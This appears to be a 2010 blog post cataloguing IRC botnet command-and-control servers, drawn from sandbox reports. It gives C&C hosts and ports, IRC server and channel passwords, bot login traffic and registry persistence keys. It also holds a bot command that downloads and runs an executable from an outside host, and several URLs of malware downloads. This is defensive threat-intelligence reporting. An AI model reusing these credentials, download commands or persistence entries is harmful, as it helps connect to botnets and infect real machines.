Month: October 2010

omgredrum.no-ip.biz

Remote Host              Port Number
omgredrum.no-ip.biz      51987

Resolved : [omgredrum.no-ip.biz] To [69.65.19.117]
Resolved : [omgredrum.no-ip.biz] To [69.65.19.116]

PASS Virus
NICK VirUs-aruhtp
USER sntmwl “” “pup” :sntmwl

Registry Modifications

* The following Registry Key was created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}
* The newly created Registry Value is:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}]
    + StubPath = “c:\RESTORE\S-1-5-21-1482476501-1644491937-682003330-1013\RedruMx.exe”
    so that ...

205.234.236.32(Parabola botnet)

Remote Host        Port Number
184.73.209.168     80
204.0.5.41         80
204.0.5.58         80
204.0.5.59         80
207.38.101.12      80
208.43.117.134     80
216.178.38.168     80
63.135.80.58       80
63.135.86.25       80
63.135.86.37       80
205.234.236.32     1234

PASS xxx
NICK NEW-[USA|00|P|39592]
USER XP-5696 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|39592] -ix
JOIN #!nn! test
PONG 22 MOTD

* The data identified by the following URLs was then requested ...

nice.niceshot.in

nice.niceshot.in 67.202.108.130

C&C Server: 67.202.108.130:6567
PASS s1m0n3t4
Server Password:
Username: XP-1204
Nickname: [SI|DEU|00|P|86096]
Channel: #sucksusb# (Password: c1rc0dus0leil)
Channeltopic: :.desfi http://iphoneate.in/salario/yem.exe c:\WINDOWS\cap.exe 1

MODE [SI|USA|00|P|97963] -ix
JOIN #update# c1rc0dus0leil
PRIVMSG #update# :[Dl]: File download: 84.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_64066.exe @ 84.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|61951]
USER XP-8990 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|61951] -ix
JOIN ...

74.208.43.209

Remote Host        Port Number
74.208.43.209      5000

JOIN ##[ENG]
JOIN #msn#
PONG :4DFB1F08
NICK [V2][ENG][COMPUTERNAME]9523
PING :redc00de.no-ip.biz

00000000 | 5041 5353 200D 0A55 7365 7220 6B6B 6B20 | PASS ..User kkk
00000010 | 6B6B 6B20 6B6B 6B20 6B6B 6B20 3A6B 6B6B | kkk kkk kkk :kkk

Registry Modifications

* The newly created Registry Values are:
  o ...

oki.nerashti.net(Burimi bad hecker)

Remote Host        Port Number
77.68.56.80        81

addr: oki.nerashti.net ip: 77.68.56.80
addr: oki.nerashti.net ip: 88.208.209.166

The domain of this criminal lamer is hosted in Australia, and it is strange that they allow botnet use from domains registered at https://www.melbourneit.com.au/

Here is the info about the Australian hosting:

Sales
Australian callers: 1300 654 677
Other callers: +61 3 8624 2300

Support
Australian ...

64.202.102.11

Remote Host        Port Number
184.73.209.168     80
204.0.5.42         80
204.0.5.56         80
204.0.5.58         80
208.43.117.134     80
216.178.38.103     80
216.178.38.168     80
63.135.86.25       80
63.135.86.30       80
64.208.138.218     80
64.202.102.11      1234

PASS xxx
NICK NEW-[USA|00|P|54508]
USER XP-6046 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|54508] -ix
JOIN #!nn! test
PONG 22 MOTD

* The data identified by the following URLs was then requested ...

109.196.130.50

Remote Host        Port Number
109.196.130.50     57221
112.78.112.208     80
218.85.133.201     80

MODE #! -ix
MODE #Ma -ix
USER SP2-668 * 0 :COMPUTERNAME
MODE [N00_USA_XP_0519458] @ -ix
MODE #dpi -ix

There was an outbound traffic produced on port 57221:

00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 ...

204.45.85.210

Remote Host        Port Number
112.78.112.208     80
208.53.183.113     80
208.53.183.92      80
218.85.133.201     80
74.63.78.27        80
91.212.127.147     80
204.45.85.210      57221   ircd here
204.45.85.218      57221   ircd here
65.55.92.152       25
76.73.36.42        8800

* The data identified by the following URLs was then requested from the remote web server:
  o http://www.nippon.to/cgi-bin/prxjdg.cgi
  o http://208.53.183.113/nbf.exe
  o http://208.53.183.92/usa.exe
  o http://208.53.183.92/zalz.exe
  o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
  o ...

69.42.218.75

Remote Host        Port Number
69.42.218.75       8878

USER rmivvghu rmivvghu rmivvghu :tqidsjkg
NICK eCTKvLpor
MODE eCTKvLpor +xi
JOIN #maxi
USERHOST eCTKvLpor
MODE #maxi +smntu
PONG :lols.nope.com

Now talking in #maxi
Topic On: [ #maxi ] [ =iSPD1SfJVIXS78hku1th2mVmfzMNV0S9vmziKgN8rsXvuchJAAboS1N6d+47GpGRbqNA1Rp5AetxCSFjRLWzVXl+QjkC2RRdv96+K+EeYItTv79hc1MOogFKpvVJaySVa6r7iVsXVKg5yrYAuvJnyLsyg6jDPOI9j1mVNgaT/5a69YtxDR1VP8QeyGS7W3DUZWZwMg1VCaKDreE1KD2kxbZ ]
Topic By: [ dbbab ]

92.241.174.61

Remote Host        Port Number
92.241.174.61      6667

NICK {XPUSA345887}
JOIN #hack
PONG irc.hackers.gov
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA345887} +ix

Registry Modifications

* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + Windows Services = “servis.exe”
    so that servis.exe runs every time Windows starts
  o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    + Windows Update = “%Temp%\service2.exe”

Memory Modifications

* There ...